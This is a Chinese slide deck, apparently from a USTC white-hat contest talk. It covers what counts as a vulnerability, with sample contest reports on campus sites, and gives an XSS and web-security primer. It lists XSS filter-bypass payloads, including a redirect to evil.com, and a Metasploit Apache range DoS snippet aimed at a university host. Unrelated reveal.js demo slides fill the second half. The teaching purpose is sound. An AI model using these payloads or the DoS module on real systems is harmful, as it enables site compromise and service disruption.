WhiteHat@USTC

在白帽子大赛,黑客不神秘

"Bojie Li" <bojieli (阿嚏) gmail.com> 

root@plac /bin >> ./ssh

linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src

greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/

什么是安全

  • 机密性:不该看到的数据不能被看到
  • 完整性:不该修改的数据不能被修改
  • 可用性:系统不能被卡死或宕掉

什么不是漏洞

漏洞ID: 77

靶标: www.ustc.edu.cn (500 分)

标题: 教务系统给我分数太低了

危害向量: AV:A/AC:H/Au:M/C:C/I:C/A:C

什么不是漏洞

未造成危害的 bug 不算漏洞

漏洞ID: 58

靶标: mis.teach.ustc.edu.cn (200 分)

标题: 论文上传可上传木马

危害向量: AV:N/AC:L/Au:N/C:C/I:C/A:P

详细说明: 综合教务系统学生平台论文上传未限制上传类型: 论文提交中论文上传,未限制上传类型,选择文件未限制文件类型,可上传php asp等造成后门

修复方法: 限制上传类型为pdf,doc等

什么不是漏洞

业务逻辑上的漏洞 (Loophole) 不算技术漏洞 (Vulnerbility)

漏洞ID: 57

靶标: 图书馆自助借/还书机 (500 分)

标题: 无限续借

危害向量: AV:A/AC:L/Au:N/C:N/I:N/A:P

详细说明: 对借书次数未进行限制,可在图书到期之前直接还掉在借,续借功能的存在毫无意义,可以一直占用图书

修复方法: 对同一本书同一人在指定时间内限制借阅次数

什么不是漏洞

用户的个人行为导致第三方利益受损,不算漏洞

漏洞ID: 69

靶标: bb.ustc.edu.cn (300 分)

标题: 相关同学的信息泄露

危害向量: AV:N/AC:L/Au:N/C:P/I:N/A:N

详细说明: 相关课程教师的BB平台主页课程信息一栏对学生信息造成泄露,联网无需登录及验证就可查看和下载名单。

修复方法: 造成信息泄露的原因是没有进行任何权限设置,设置权限登录才能查看即可。

&lt; 2000

  • 攻击主要针对系统软件(例如黑客帝国中的 sshnuke)和网络设备
  • 系统软件一旦发现漏洞,影响范围往往很大(例如内核 SCTP 协议栈缓冲区溢出、OpenSSL Heartbleed、Java Struts2 远程命令执行)
  • 经典的网络攻击,如无线嗅探、WEP 无线密码破解;ARP 欺骗、ICMP redirect
  • 针对系统软件的 0day 可遇不可求。当然学校里很多机器 uptime 转了一圈也不升级,497day 漏洞还是很多的

BETWEEN (2000, 2010)

  • 随着防火墙的兴起和软件安全性的提高,影响严重的系统漏洞越来越难找了,开放在网络上的端口越来越少
  • 一些人渗透用户的客户端(木马)
  • 另一些人渗透服务器程序,当时的网站普遍不重视安全,到处都是 SQL 注入、代码下载、任意文件上传、弱口令。嗯,学校里的一些老旧网站仍然在这个阶段

&gt; 2010

  • 中杀软比中木马还容易,一不留心就装上百度全家桶
  • 再加上 UAC,客户端木马的日子越来越难过了
  • Web 安全成了主要的突破口和问题最多的地方
  • 网络上的数据越来越重要,要窃取某个特定用户的隐私,XSS、CSRF、点击劫持、Cookie 泄露等攻击越来越流行

F12 大法好

拉黑人人网非好友

存储型 XSS

XSS 的基本原理:数据和代码没有分离,导致对 HTML 的注入

<script>alert(1);</script>

绕过 XSS 过滤器

<scRiPt>alert(1);</scrIPt>
<scr<script>ipt>alert(1)</scr<script>ipt>
<a href="javascript:alert(1)">18 岁以下免进</a>
<img src=x onerror=alert(1);>
<video src=x onerror=alert(1);>
<a onmouseover="javascript:window.onerror=alert;throw 1>
<meta http-equiv="refresh" content="0;url=//evil.com">

更多

反射型 XSS

反射型 XSS 的基本原理:URL 参数回显在页面上

http://example.com/search?keyword=<script>alert(1)</script>

无回显,无 XSS

漏洞ID: 47

靶标: lib.ustc.edu.cn (300 分)

标题: 新闻查看页面存在 XXS

详细说明: 服务公告相关链接网址存在XSS漏洞,URL中存在汉字例如:

http://lib.ustc.edu.cn/电子资源/database/试用数据库/【试用】astm数据库/
http://lib.ustc.edu.cn/服务公告/【通知】办理2015届本科毕业生离校注销手续的通知/

修复方法: 存在XSS漏洞的原因是URL存在汉字,将其修改为不含汉字或带百分号的URL编码

反射型 XSS

如果 URL 参数只是回显在输入框里,有时需要把输入框的引号闭合掉

http://example.com/search?keyword="><script>alert(1);</script>
http://example.com/search?keyword="><img src=x onerror=alert(1);>
http://example.com/search?keyword=" autofocus onfocus=alert(1)//
样例:http://stuhome.ustc.edu.cn/search.php

DOM-based XSS

HTML 实体转义就够了吗

                      <a onclick="alert('{{ userinput }}')"></a>
                    
                      用户提交: ');alert('1
                      userinput = htmlspecialchars("');alert('1");
                    
                      HTML 实体字符先被解析,JavaScript 再被执行
                      <a onclick="alert('');alert('1');"></a>

不同的地方使用不同的转义

  • HTML 里转义 HTML 特殊字符(<)为实体字符(&lt;)
  • JavaScript 里变量需在引号内,并转义引号,加反斜杠
  • URL 里转义需要使用 URL Encode(空格变成%20)
  • 前后端程序统一使用 UTF-8 编码,避免编码漏洞

SQL 注入

SQL 注入原理:数据与代码混杂。

Metasploit

# msfconsole
use auxiliary/dos/http/apache_range_dos
show options
set RHOSTS wlt.ustc.edu.cn
set ACTION CHECK
run

Vertical Slides

Slides can be nested inside of each other.

Use the Space key to navigate through all slides.


Down arrow

Basement Level 1

Nested slides are useful for adding additional detail underneath a high level horizontal slide.

Basement Level 2

That's it, time to go back up.


Up arrow

Slides

Not a coder? Not a problem. There's a fully-featured visual editor for authoring these, try it out at http://slides.com.

Point of View

Press ESC to enter the slide overview.

Hold down alt and click on any element to zoom in on it using zoom.js. Alt + click anywhere to zoom back out.

Touch Optimized

Presentations look great on touch devices, like mobile phones and tablets. Simply swipe through your slides.

Fragments

Hit the next arrow...

... to step through ...

... a fragmented slide.

Fragment Styles

There's different types of fragments, like:

grow

shrink

roll-in

fade-out

current-visible

highlight-red

highlight-blue

Transition Styles

You can select from different transitions, like:
None - Fade - Slide - Convex - Concave - Zoom

Themes

reveal.js comes with a few themes built in:
Black (default) - White - League - Sky - Beige - Simple
Serif - Night - Moon - Solarized

Slide Backgrounds

Set data-background="#dddddd" on a slide to change the background color. All CSS color formats are supported.

Down arrow

Image Backgrounds

<section data-background="image.png">

Tiled Backgrounds

<section data-background="image.png" data-background-repeat="repeat" data-background-size="100px">

Video Backgrounds

<section data-background-video="video.mp4,video.webm">

Background Transitions

Different background transitions are available via the backgroundTransition option. This one's called "zoom". 

Reveal.configure({ backgroundTransition: 'zoom' })

Background Transitions

You can override background transitions per-slide. 

<section data-background-transition="zoom">

Pretty Code


function linkify( selector ) {
  if( supports3DTransforms ) {

    var nodes = document.querySelectorAll( selector );

    for( var i = 0, len = nodes.length; i < len; i++ ) {
      var node = nodes[i];

      if( !node.className ) {
        node.className += ' roll';
      }
    }
  }
}

Code syntax highlighting courtesy of highlight.js.

Marvelous List

  • No order here
  • Or here
  • Or here
  • Or here

Fantastic Ordered List

  1. One is smaller than...
  2. Two is smaller than...
  3. Three!

Tabular Tables

Item Value Quantity
Apples $1 7
Lemonade $2 18
Bread $3 2

Clever Quotes

These guys come in two forms, inline: “The nice thing about standards is that there are so many to choose from” and block:

“For years there has been a theory that millions of monkeys typing at random on millions of typewriters would reproduce the entire works of Shakespeare. The Internet has proven this theory to be untrue.”

Intergalactic Interconnections

You can link between slides internally, like this.

Speaker View

There's a speaker view. It includes a timer, preview of the upcoming slide as well as your speaker notes.

Press the S key to try it out.

Export to PDF

Presentations can be exported to PDF, here's an example:

Global State

Set data-state="something" on a slide and "something" will be added as a class to the document element when the slide is open. This lets you apply broader style changes, like switching the page background.

State Events

Additionally custom events can be triggered on a per slide basis by binding to the data-state name. 


Reveal.addEventListener( 'customevent', function() {
	console.log( '"customevent" has fired' );
} );

Take a Moment

Press B or . on your keyboard to pause the presentation. This is helpful when you're on stage and want to take distracting slides off the screen.

Much more

THE END

- Try the online editor
- Source code & documentation